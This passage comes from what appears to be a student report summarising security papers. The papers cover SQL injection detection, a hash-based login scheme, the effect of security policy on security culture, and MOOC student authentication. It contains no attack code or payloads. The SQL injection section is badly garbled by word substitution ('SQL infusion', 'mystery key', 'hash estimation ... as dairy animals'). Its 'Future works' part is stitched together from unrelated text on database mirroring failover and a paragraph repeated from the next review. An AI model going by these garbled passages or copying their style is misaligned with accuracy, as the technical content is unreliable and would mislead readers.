Static Approach:

Programming engineers give a couple rules for SQLIA location in the midst of web
application progression and this technique is generally called pre-making approach. For the
pre-made method for distinguishing SQLIA a convincing authenticity checking segment is
required for the data variable data.

Dynamic Approach:

Post-made strategies are useful for examination of component or SQL inquiry on runtime,
delivered by customer data by a web application and thus this philosophy is generally called
post-made approach. Location strategies works under this post-delivered class executing

39
before exhibiting an inquiry on the database server. In this paper, they have managed the
security on the finishes, i.e. frontend and backend, with no compromisation by proposing the
two frameworks for maintaining a strategic distance from SQLIA.

Impact of research in sql injection

SQL infusion Attack (SQLIA) can be identified in many web applications that absence of
information variable separating. The issue of this review is the frail information filtration and
approval of structures in powerful web applications what's more, utilizing a solitary discovery
and counteractive action method against SQL infusion assaults. The point of this review is to
explore the impact of poor info approval of SQL question to segregate the parameters utilized
for infusion vindictive SQL on the security of server database and to enhance the filtration
level of a client contribution from genuine one and a vindictive one on unique web
applications in online business, and to proposes a strategy called Combined Detect in light of
two strategies in view of JavaScript and PHP coding to distinguish malignant SQL question
and seclude it before sending to the server. The aftereffect of this review demonstrates that
many web designers disregard the high dangers of SQL infusion assaults on the security and
secretly of information put away in databases. The infusion of malignant SQL parameters go
to the database in the server could harm the entire database or take information. The strategy
utilized in this review depends on JavaScript and PHP codes empower the dynamic web
application to isolate between ordinary information and pernicious information, in any case
of what client info is entered through information fields. The review suggested evading any
shortcoming in SQL server by giving powerful information approval to separate the noxious
parameters utilized for infusion SQL assault inquiries and utilizing different location
techniques for SQL infusion.

Methodology and Techniques

The working of proposed strategy is characterized in two sorts:

New Client Registration

Another customer enters the sign in subtle elements like unmistakable name and mystery key
on customer side to get enlisted. As shown by the proposed plan, the unmistakable name and
mystery key is set up at the middle level. The following are the stages:

40
1. To find hash estimation of sign in name by mystery key as dairy animals.

2. To find hash estimation of mystery key by sign in name as bovine.

3. Connecting the consequence of step1 and step2 to find last hash code.

4. Login name, Secret key and last hash code are to be secured into the customer table.

Login and verification

The login structure must be filled by the customer to get marked into the database. The
following are the given stages: -

1. An unmistakable name and mystery key is to be entered at customer side.

2. The name set away in customer table is coordinated with the entered customer name.

3. According to proposed framework to find last hash code at run time, the customer
name and mystery key is taken care of after the customer name is being coordinated.

4. Last hash code and mystery word is checked with put away esteems in the database.

5. If customer is real then he/she can get to information from database or else inaccurate
content is appeared.

Future works and Recommendation

In the research off a comprehensive computer security policy has a direct effect on computer
security culture, which can be further explained through indirect effects. It is anticipated that
the statistical findings of this research will support the conceptual research model. It is further
anticipated that the findings of this study will benefit scholars and practitioners alike. High-
wellbeing mode with programmed failover is intended for a high-benefit organize that has
either a devoted association or a genuinely straightforward system design that limits the
wellsprings of conceivable system disappointments. Such an excellent system condition is
fundamental for high-security mode with programmed failover and is prescribed for all
database reflecting sessions. Be that as it may, elite mode and high-security mode without
programmed failover are a great deal less influenced by system reliability. In test situations, it
is proper to investigate all the working modes to assess how database reflecting performs. In

41
any case, before you send reflecting into a creation domain, ensure that you see how the
system capacities in this present reality.

42
Lin Siong Jie TP032265
Journal Information

Title : Effects of a Comprehensive Computer Security Policy on Computer Security

Culture

Author : Dennis C. Acuña

Journal Name : Midwest (MWAIS)[ CITATION DAr12 \l 17417 ][ CITATION DAr07 \l 17417 ]

Date : 19 May 2016

Research Paper Objectives

This paper has a main objective that to reviewed the Effects of a Comprehensive Computer
Security Policy on Computer Security Culture. The paper will explain the Effects of a
Comprehensive Computer Security Policy on Computer Security Culture. The researcher
explores the direct effect that a comprehensive computer security policy has on computer
security culture and on a computer security program, as well as the indirect effects derived
there from.

Finding Outcome

Key to the premise of this study is the scope and ownership of the computer security policy.
This study contends that a computer security policy must be comprehensive in scope in order
to have a meaningful impact on enterprise computer security culture, as a comprehensive
computer security policy represents a policy that spans all aspects of enterprise computer
security. This study defines a comprehensive computer security policy as a top-level policy
incorporating enterprise ownership of both IT computer security and OT computer security.
A practical reference to this viewpoint is that described by the Reference Model for
Computer Integrated Manufacturing (CIM), wherein the separation between the IT domain
and the OT domain can be paraphrased as the point of demarcation between computer
decision support systems leveraged by humans (IT), and computer industrial control systems
that make control decisions autonomously (OT).

43
The premise of this study holds that a comprehensive scope is necessary for a computer
security policy to have a meaningful impact on computer security culture, and that it is the
comprehensive nature of the computer security policy that separates this study from other
studies in this domain. A comprehensive computer security policy sets the tone for clear
ownership of enterprise computer security by recognizing the difference between IT and OT,
which in turn sets the tone for developing and maintaining a culture of computer security
across an enterprise. Every human in the enterprise is responsible for computer security
regardless of whether their assigned role aligns more closely with IT computer security than
OT computer security, and vice versa, and this distinction must be recognized by a top-level
policy for persistence of a meaningful computer security culture.

The premise of this study is both novel and timely in its intent to better understand the factors
that influence a culture of computer security, given that computer security culture is posited
as an effective control for managing the human aspect of computer security. The premise is
novel in that no peer reviewed research was found that explained the direct effect of a
comprehensive computer security policy on computer security culture through an
understanding of its indirect effects. The premise is timely in that computer threats and
computer vulnerabilities, sometimes referred to as cybersecurity, are evolving rapidly and are
capable of introducing significant computer risk to an organization. Therefore, research that
contributes to a better understanding of the factors that impact computer security culture
represents research that is important to any organization that relies on humans for computer
security.

44
Methodology and Techniques

The researcher used a survey instrument and a Likert scale for measurement. Where possible,
questions for the survey instrument will be drawn from similar studies conducted in this
research domain. A commercial Internet service will be used for survey instrument
distribution and data collection. A pilot survey will be conducted prior to the primary data
survey to ensure robustness. Target respondents are information technology practitioners
located within the United States, randomly selected from the information technology
workforce.

Multivariate data analysis techniques performed on the collected data will include
confirmatory factor analysis (CFA) to test how well the measured variables represent model
constructs. Structural equation modelling (SEM) will be used to estimate the overall fit of the
model. Particular attention will be given to the indirect effect of factors, both mediating and
moderating, impacting computer security culture.

Extant research incorporating Technology Threat Avoidance Theory (TTAT), deterrence

theory, and the constructs of perceived effectiveness, perceived avoid ability, and self-
efficacy were referenced to help develop the conceptual research model shown on below
figure.

Figure 1: Conceptual Research Model

Future Works and Recommendation

In the research off a comprehensive computer security policy has a direct effect on computer
security culture, which can be further explained through indirect effects. It is anticipated that
the statistical findings of this research will support the conceptual research model. It is further
anticipated that the findings of this study will benefit scholars and practitioners alike.

45
46
Jin Hao TP035111
Providing Information Security to MOOC: Towards effective student authentication

• Research Paper Objectives：

The Massive Open Online Courses (MOOCs) are defined as open, free, participatory and
distributed courses that represent a new generation of online education, easy and extensive
access on the Internet, and involve a large or large number of students. However, due to the
highest ranking of the academic community to join the MOOC hype, other MOOC challenges
have to be faced, such as high dropout rate, bad level, plagiarism, security vulnerabilities and
abnormal certification. In fact, although the MOOC is easy and widely accessible, and
therefore generally involves a very large number of participants, abnormal user authentication
cannot ensure that the actual identity of MOOC students is actually known in order to verify
that MOOC students are saying who they are Is or is cheating the system.

MOOCs' current deliverers are extremely concerned about this user authentication issue and
make terrific efforts to know and verify the student identity throughout the MOOC sessions.
For example, they use biometrics (e.g. typing patterns) and other complicated mechanisms,
which sometimes prove unreliable and are frequently privacy intrusive. This also turns into
an issue for employing enterprises relying on the emergent MOOC educational phenomenon
and satisfying accrediting institutions. Innovative user authentication methods for verifying
MOOC students’ identity are required, so that the course progress and results are not
compromised by either incompetence or malice. This paper is a step towards this direction.

Despite the fast development and vertiginous growth of Massive Open On-line Courses
(MOOC) over the last two years, there exist still relevant drawbacks impeding MOOCs to
prove to be their actual potential for education. Among these drawbacks, this paper
investigated the lack of Information Security's provision to MOOC, with regards to
anomalous user authentication, which cannot verify identity of the actual student to meet
grading requirements as well as satisfy accrediting institutions. To overcome the issue, this
paper proposed a global user authentication model that was called MOOC-SIA.

47
• Finding and outcome：

Although collaborative and networking activities are part of the MOOC, they need need not
reside on the same platform. On the other hand, one of the problems in the MOOC arena is
the security vulnerabilities.

Security vulnerabilities are broadly defined as the opportunity which could allow attackers to
violate the security. Security vulnerabilities are normally found in learning management
systems (LMS). Over the last years, a large quantity of full-featured Web based LMS systems
have appeared in the marketplace with security vulnerabilities in e-mail, web, and other
protocols and other security issues in the LMS software infrastructure requirements. The
Trustwave 2012 Global Security Report shows to how web application servers and database
management systems, which support LMS infrastructure usually, are deployed with security
flaws. Regarding network protocols required in LMS, the same report shows that although
encrypted protocols have existed for more than a decade, their insecure predecessors continue
to predominate.

The authors considered some specific LMS to be real software vulnerabilities. Moodle is an
Open Source LMS which has become very popular among educators around the world as a
tool for creating on-line dynamic web sites for their students. Although Moodle is not
representative of all available LMS, its importance is shown by the adoption statistics, and
the authors thought it might be LMS vulnerabilities in their study.

The authors argued that traditional security approaches when applied to the design of most
advanced eLearning systems do not provide the necessary security requirements with to
guarantee that all supported learning processes are developed correctly and in a reliable way
in their previous research. Besides, e-learning components' value has to be protected from
modification and unauthorized use adequately, without preventing students from using it in a
flexible way. To this end, an innovative approach of Secure Learning Management Systems
(SLMS) was proposed based on security properties, attacks and Public Key Infrastructure
(PKI) solutions.

Has been claimed by some authors as an essential feature in the MOOC arena, especially for
grading, eventual certification purposes, provided that security approaches specifically to
MOOC, and in particular effective student authentication (i.e. ensure that students are who
they say they are) and evaluation. For example, course certification can make the difference

48
for business models that are based on value-added services of MOOC needing identity of the
student is known and verified. Some popular MOOC platforms, such as Coursera, has
recently developed complex mechanisms that were based on keystroke biometrics (e.g.,
typing patterns) to verify identity of participants during MOOC sessions. Biometrics
methods, however, are not still reliable and privacy intrusive.

Innovative user authentication methods for verifying identity of MOOC students are required,
so that the results and course progress are not compromised by either malice or
incompetence. For the purpose of effective user authentication in MOOCs, the authors
proposed an innovative use of data mining of education.

Data mining of Education (EDM) is among researches of education most active fields. Data
mining techniques are widely applied to extract knowledge from the large data sets and they
have been extensively used in the online learning domain. In the paper, they proposed to use
most of the up-to-date mining techniques to extract and build useful knowledge from the data
that were generated from the user-user interactions and user-system with MOOC. This
knowledge will be then the basis to develop innovative user authentication strategies that will
help to know and verify the actual participants during MOOC sessions.

• Impact of research：

An innovation in their model is the use of EDM [6] techniques for continuous user
authentication mechanisms [20]. Due to the high degree of student interaction during MOOC
sessions, the authors took great advantage of the tracking-based techniques of user modeling,
such as providing broader and better support for the users of on-line educational systems
[23]. Their purpose is to track a student's short-term interaction constantly with the MOOC
platform and then compare it to historical or long-term profile/user model of the student by
using EDM techniques in order to look for potential deviations (anomalous authentication).
The required data for tracking can be collected to a large extent from information that is kept
in log data files of the MOOC platform (timestamp, user navigation, involving IP and other
log data). This information is then analyzed and adequately interpreted in order to extract the
knowledge needed to build the desired user model for their purpose of user authentication.

• Methodology and Techniques：

49
The authors presented their global user authentication model for MOOC platforms that were
based on a multi-fold security approach in the context of general purpose's MOOCs. To this
end, they first elicited the requirements for their authentication model from a hypothetical
case study as follows.

An e-learning platform delivers a MOOC that is named "applying security on IT projects"

focused on Information Technology (IT) targeting students who are interested in IS
improvements that are applied to IT projects. This MOOC is offered as a part of the Open
University of Catalonia (UOC) Open Programs initiative and deployed into UOC Open
Courseware, with unlimited number of participants. It includes self-and peer-assessment
activities, and a final automatic test. After the course's successful accomplishment, the
student receives credits and an official certificate issued by UOC.

In this scenario, it is essential to verify identity of students during the course, especially when
assessment activities are performed, thus also satisfying UOC's accrediting requirements. To
meet these requirements, the authors proposed a modular PKI-based security model that was
called MOOC Smart Identity Agent (MOOC-SIA) as the main component managing different
authentication methods in the MOOC platform in a centralized fashion.

In order to explain an architectural view of the example application and solution for their case
study, the authors provided a figure to illustrate the MOOC-SIA model and showed case
example to a use. Firstly, the course designer, who is working in a specific assessment
activity, creates a new CCAL by selecting the most suitable authentication methods for this
particular assessment and using the ALD module. To this end, the course designer selects
public PKI, double verification (e.g. firstly, login and password and then SMS code) and a
biometric method (e.g. participant's fingerprint).

• Future works and Recommendation：

50
On-going work is to provide an implementation prototype of their model that is integrated in
a real LMS and experiment with it. They plan to explore distributed infrastructures' use to the
prototype to gain in performance when using real-time user tracking and data processing
techniques.

There are certain LMSs which even though supporting multiple authentication methods, they
cannot be applied simultaneously by user, method, etc.. Additionally MOOC-SIA
implementation and integration into existing LMS may be a challenge. The provision of real-
time user that tracks for student verification in MOOCs by using EDM techniques involves
processing large amounts of information of a great variety of formats and type. MOOC
sessions are characterized by a high degree of user-user and user-system interaction
producing huge amounts of valuable data that are stored typically in server log files. As a
consequence, treating this information is very costly in time and space needing a great
processing effort, thus requiring high performance computational power, which may become
an issue to consider.

Furthermore, although the requirements for their authentication model have been elicited
from a hypothetical case study and these requirements are involved in an actual UOC
scenario, there are variables which should be considered in further work in order to test the
accuracy of its authentication methods and MOOC-SIA model. Among these variables, they
may consider the amount of data to be processed and training the system's time.

With regarding to their model's future implementation prototypes, the authors should
consider the problem of log files' massive processing in the UOC Open Courseware
framework. They are made up of millions of lines, each of which representing an operation
that was performed by particular users, the size of these log files keeps growing and the high
variety of event information kept the log data files in. Their model's prototypes should
therefore be able to correctly collect and store the learning activity and to increase the
efficiency during the analysis stages and later data processing in order to implement EDM
techniques focused on real time and offline data analysis of authentication anomaly detection.

51
References
@2017 VMware, I. (2017, June 01). vmware. Retrieved from Welcome to VMware:
https://www.vmware.com/

Alec Yasinsac, J. F. (2017, June 02). Developing an Academic Security Laboratory. Retrieved from
http://www.cisse.info/history/CISSE%20J/2002/yasi.pdf

Arachni. (2017, June 01). Web Application Security Scanner Framework. Retrieved from Arachni:
http://www.arachni-scanner.com/

Bernardo Damele A. G., M. S. (2016). sqlmap®. Retrieved from Automatic SQL injection and database
takeover tool: http://sqlmap.org/

C.Acuna, D. (2016). Effects of a Comprehensive Computer Security Policy on Computer Security

Culture. MWAIS 2016.

D'Arcy, J. &. (2007). DETERRING INTERNAL INFORMATION SYSTEM MISUSE. Communication of the
ACM, 113-117.

D'Arcy, J. H. (2012). Employee Miuse of Information Technology Resorces : Testing a Contemporary

Deterrence Model. Decision Sciences, 1091-1124.

Linux, K. (2017, Jube 03). Our Most Advanced Penetration Testing Distribution, Ever. Retrieved from
Kali BY OFEENSIVE SECURITY: https://www.kali.org/

PEREZ, T. (2015, May 18). Retrieved from Website Security: How Do Websites Get Hacked?:
https://blog.sucuri.net/2015/05/website-security-how-do-websites-get-hacked.html

Prieto, J. M. (20133, 6 12). Providing Information Security to MOOC: Towards Effective Student
Authentication，. Retrieved 6 2, 2017, from IEEE:
http://ieeexplore.ieee.org/abstract/document/6630424/?reload=true

Sarah Morse, studioD. (2016). The Negative Effects of Hackers. Retrieved from Tech in our everyday
life: http://techin.oureverydaylife.com/negative-effects-hackers-2867.html

Swarnaprabha Patil, P. N. (2015). Web Security Attack and Injection. International Journal of
Advancements in Research & Technology .

Ulfar Erlingsson a, B. L. (n.d.). End-to-End Web Application Security.

Warren, M. &. (2009). Hacker Taggers: A new type of hackers. Information Systems Frontiers.

Xue, X. L. (n.d.). A Survey on Web Application Security. Vanderbilt University.

Z.Omary, D. a. (2011). Towards using Social Network and Internet-enabled Mobile Devices for
Learning. Preparedness.

52